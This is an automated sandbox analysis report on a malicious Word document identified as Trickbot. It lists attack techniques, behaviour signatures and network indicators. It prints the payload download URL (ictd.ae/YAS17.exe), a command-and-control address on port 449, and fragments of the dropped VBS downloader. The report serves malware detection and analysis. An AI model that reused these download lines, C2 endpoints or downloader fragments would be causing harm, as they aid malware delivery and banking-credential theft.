
Analysis Report 98.doc

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 212960
Start date: 04.03.2020
Start time: 19:51:18
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 3s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 98.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@13/14@2/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 76.1% (good quality ratio 73.8%)
  • Quality average: 85.9%
  • Quality standard deviation: 24.6%
HCA Information:
  • Successful, ratio: 89%
  • Number of executed functions: 72
  • Number of non-executed functions: 198
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): conhost.exe
  • Excluded IPs from analysis (whitelisted): 8.248.121.254, 8.241.78.126, 8.241.122.126, 67.26.137.254, 67.26.81.254
  • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Timeout during Intezer genetic analysis for unpackpe/5.2.ZXTRTU.exe.5a0000.1.unpack

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Whitelisted: false
Threat: Trickbot
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification Spiderchart

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts1 | Scripting32 | Valid Accounts1 | Valid Accounts1 | Disabling Security Tools1 | Credential Dumping | System Time Discovery1 | Remote File Copy12 | Data from Local System | Data Encrypted11 | Uncommonly Used Port1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact1
Replication Through Removable Media | Execution through API22 | Scheduled Task1 | Access Token Manipulation11 | Scripting32 | Network Sniffing | Account Discovery1 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Remote File Copy12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Exploitation for Client Execution23 | Accessibility Features | Process Injection111 | Obfuscated Files or Information11 | Input Capture | Security Software Discovery23 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Cryptographic Protocol22 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Graphical User Interface1 | System Firmware | Scheduled Task1 | Masquerading1 | Credentials in Files | File and Directory Discovery4 | Logon Scripts | Input Capture | Data Encrypted | Standard Non-Application Layer Protocol2 | SIM Card Swap | | Premium SMS Toll Fraud
Exploit Public-Facing Application | Command-Line Interface3 | Shortcut Modification | File System Permissions Weakness | Valid Accounts1 | Account Manipulation | System Information Discovery117 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Application Layer Protocol23 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Spearphishing Link | Scheduled Task1 | Modify Existing Service | New Service | Virtualization/Sandbox Evasion12 | Brute Force | Virtualization/Sandbox Evasion12 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | | Abuse Accessibility Features
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Access Token Manipulation11 | Two-Factor Authentication Interception | Process Discovery3 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Process Injection111 | Bash History | Application Window Discovery1 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection | Input Prompt | System Owner/User Discovery1 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | | Data Destruction
Trusted Relationship | PowerShell | Change Default File Association | Exploitation for Privilege Escalation | Scripting | Keychain | Remote System Discovery1 | Taint Shared Content | Audio Capture | Commonly Used Port | Connection Proxy | | | Data Encrypted for Impact
Hardware Additions | Execution through API | File System Permissions Weakness | Valid Accounts | Indicator Removal from Tools | Private Keys | System Network Configuration Discovery1 | Replication Through Removable Media | Video Capture | Standard Application Layer Protocol | Communication Through Removable Media | | | Disk Structure Wipe

Signature Overview



AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Virustotal: Detection: 13%
Yara detected Trickbot
Source: Yara match | File source: 00000007.00000002.1498504077.029A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ZXTRTU.exe PID: 2356, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005B46B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_005B46B0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A70F0 CryptBinaryToStringW,CryptBinaryToStringW,5_2_005A70F0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005B0120 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,5_2_005B0120
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005AC9B0 CryptStringToBinaryW,CryptStringToBinaryW,5_2_005AC9B0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005F0120 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,7_2_005F0120
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005F46B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,7_2_005F46B0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005E70F0 CryptBinaryToStringW,CryptBinaryToStringW,7_2_005E70F0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005EC9B0 CryptStringToBinaryW,CryptStringToBinaryW,7_2_005EC9B0

Spreading:

Creates COM task schedule object (often to register a task for autostart)
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_CURRENT_USER_CLASSES\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005B09C0 FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindClose,5_2_005B09C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A4060 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,FindClose,5_2_005A4060
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A3230 FindFirstFileW,lstrcmpiW,FindNextFileW,FindNextFileW,Sleep,lstrcmpiW,FindNextFileW,FindNextFileW,FindNextFileW,lstrcmpiW,FindClose,5_2_005A3230
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005E4060 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,FindClose,7_2_005E4060
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005F09C0 FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindClose,7_2_005F09C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005E3230 FindFirstFileW,lstrcmpiW,FindNextFileW,FindNextFileW,Sleep,lstrcmpiW,FindNextFileW,FindNextFileW,FindNextFileW,lstrcmpiW,FindClose,7_2_005E3230
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\DiskDrive\1\Volume\BackFiles\errorfix.bat
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: ictd.ae
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.2.2:49159 -> 198.15.119.71:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.2.2:49158 -> 198.72.111.141:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2022658 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 (WinHTTPRequest) 192.168.2.2:49158 -> 198.72.111.141:80
Source: Traffic | Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.2:49161 -> 181.129.104.139:449
Potential malicious VBS script found (has network functionality)
Source: C:\Windows\System32\cmd.exe | Dropped file: mySettings4.Write mySettings2.ResponseBody
Source: C:\Windows\System32\cmd.exe | Dropped file: mySettings4.SaveToFile concept
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.2:49161 -> 181.129.104.139:449
Downloads executable code via HTTP
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Date: Wed, 04 Mar 2020 18:54:01 GMT; Server: Apache; Last-Modified: Wed, 04 Mar 2020 18:35:09 GMT; Accept-Ranges: bytes; Content-Length: 294400; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: GET /YAS17.exe HTTP/1.1; Connection: Keep-Alive; Accept: */*; User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5); Host: ictd.ae
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 198.15.119.71
Source: unknown | TCP traffic detected without corresponding DNS query: 181.129.104.139
Downloads files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /YAS17.exe HTTP/1.1; Connection: Keep-Alive; Accept: */*; User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5); Host: ictd.ae
Found strings which match to known social media urls
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: ictd.ae
Urls found in memory or binary data
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: ZXTRTU.exe, 00000007.00000002.1495072849.01060000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.n
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: ZXTRTU.exe, 00000007.00000002.1495072849.01060000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: ZXTRTU.exe, 00000007.00000002.1495072849.01060000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: ZXTRTU.exe, 00000007.00000002.1498540169.029D6000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: ZXTRTU.exe, 00000007.00000002.1498540169.029D6000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabda
Source: cscript.exe, 00000003.00000002.1060687122.002D0000.00000004.00000020.sdmp, errorfix.bat.0.dr | String found in binary or memory: http://ictd.ae/YAS17.exe
Source: cscript.exe, 00000003.00000003.1060375579.002FC000.00000004.00000001.sdmp, cscript.exe, 00000003.00000002.1060706772.002FF000.00000004.00000001.sdmp | String found in binary or memory: http://ictd.ae/YAS17.exe7
Source: cscript.exe, 00000003.00000002.1060559645.0013C000.00000004.00000010.sdmp, cscript.exe, 00000003.00000002.1061635667.024C0000.00000004.00000040.sdmp | String found in binary or memory: http://ictd.ae/YAS17.exeC:
Source: cscript.exe, 00000003.00000003.1060375579.002FC000.00000004.00000001.sdmp, cscript.exe, 00000003.00000002.1060706772.002FF000.00000004.00000001.sdmp | String found in binary or memory: http://ictd.ae/YAS17.exeN
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: ZXTRTU.exe, 00000007.00000002.1495072849.01060000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: ZXTRTU.exe, 00000007.00000002.1495072849.01060000.00000004.00000001.sdmp | String found in binary or memory: http://wtfismyip.com/text
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: ZXTRTU.exe, 00000007.00000002.1498504077.029A4000.00000004.00000001.sdmp, ZXTRTU.exe, 00000007.00000002.1498540169.029D6000.00000004.00000001.sdmp | String found in binary or memory: https://181.129.104.139:449/yas17/642294_W617601.6A691057E4DEC904761D3BFBC750047B/5/spk/
Source: ZXTRTU.exe, 00000007.00000002.1498504077.029A4000.00000004.00000001.sdmp | String found in binary or memory: https://181.129.104.139:449/yas17/642294_W617601.6A691057E4DEC904761D3BFBC750047B/5/spk/MEMX
Source: ZXTRTU.exe, 00000007.00000002.1488654040.00313000.00000004.00000020.sdmp | String found in binary or memory: https://api.ip.sb/ip:
Source: ZXTRTU.exe, 00000007.00000002.1498504077.029A4000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org/?format=text2
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp, ZXTRTU.exe, 00000007.00000002.1494866799.00E60000.00000004.00000001.sdmp | String found in binary or memory: https://www.myexternalip.com/raw
Source: ZXTRTU.exe, 00000007.00000002.1494866799.00E60000.00000004.00000001.sdmp | String found in binary or memory: https://www.myexternalip.com/raw2
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 49159 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49160 -> 443

E-Banking Fraud:

Yara detected Trickbot
Source: Yara match | File source: 00000007.00000002.1498504077.029A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ZXTRTU.exe PID: 2356, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005B0120 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,5_2_005B0120
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005F0120 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,7_2_005F0120

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content"
Potential malicious VBS script found (suspicious strings)
Source: C:\Windows\System32\cmd.exe | Dropped file: Set mySettings2 = CreateObject("WinHttp.WinHttpRequest.5.1")
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005B55B0 NtQuerySystemInformation,NtQueryObject,NtQuerySystemInformation,Sleep,OpenProcess,GetCurrentProcess,DuplicateHandle,NtQueryObject,NtQueryObject,lstrcmpiW,NtQueryObject,lstrcmpiW,CLSIDFromString,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A2330 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_01300430 GetCurrentProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_0130040F GetCurrentProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_013002E2 GetCurrentProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005F55B0 NtQuerySystemInformation,NtQueryObject,NtQuerySystemInformation,Sleep,OpenProcess,GetCurrentProcess,DuplicateHandle,NtQueryObject,NtQueryObject,lstrcmpiW,NtQueryObject,lstrcmpiW,CLSIDFromString,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005E2330 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_00690430 GetCurrentProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_0069040F GetCurrentProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_006902E2 GetCurrentProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005BA1A0 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,OpenProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,OpenProcessToken,RevertToSelf,DuplicateTokenEx,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,GetLastError,CloseHandle,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A15D0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A45C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005B09C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005B8870
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005ACC90
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A9090
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A8C80
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005AA150
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A6540
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005AF910
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005B9980
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005AB1B0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005BA1A0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A3230
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A82C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005BB280
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A1AB0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005AAB40
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005A53C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005E15D0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005E45C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005F09C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005E3230
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005E1AB0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005F8870
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005ECC90
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005E9090
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005E8C80
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005EA150
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005E6540
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005EF910
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005F9980
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005EB1B0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005FA1A0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005E82C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005FB280
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005EAB40
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005E53C0
Document has an unknown application name
Source: 98.doc | OLE indicator application name: unknown
PE file contains strange resources
Source: ZXTRTU.exe.3.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Classification label
Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@13/14@2/3
Contains functionality to adjust token privileges (e.g. debug / backup)
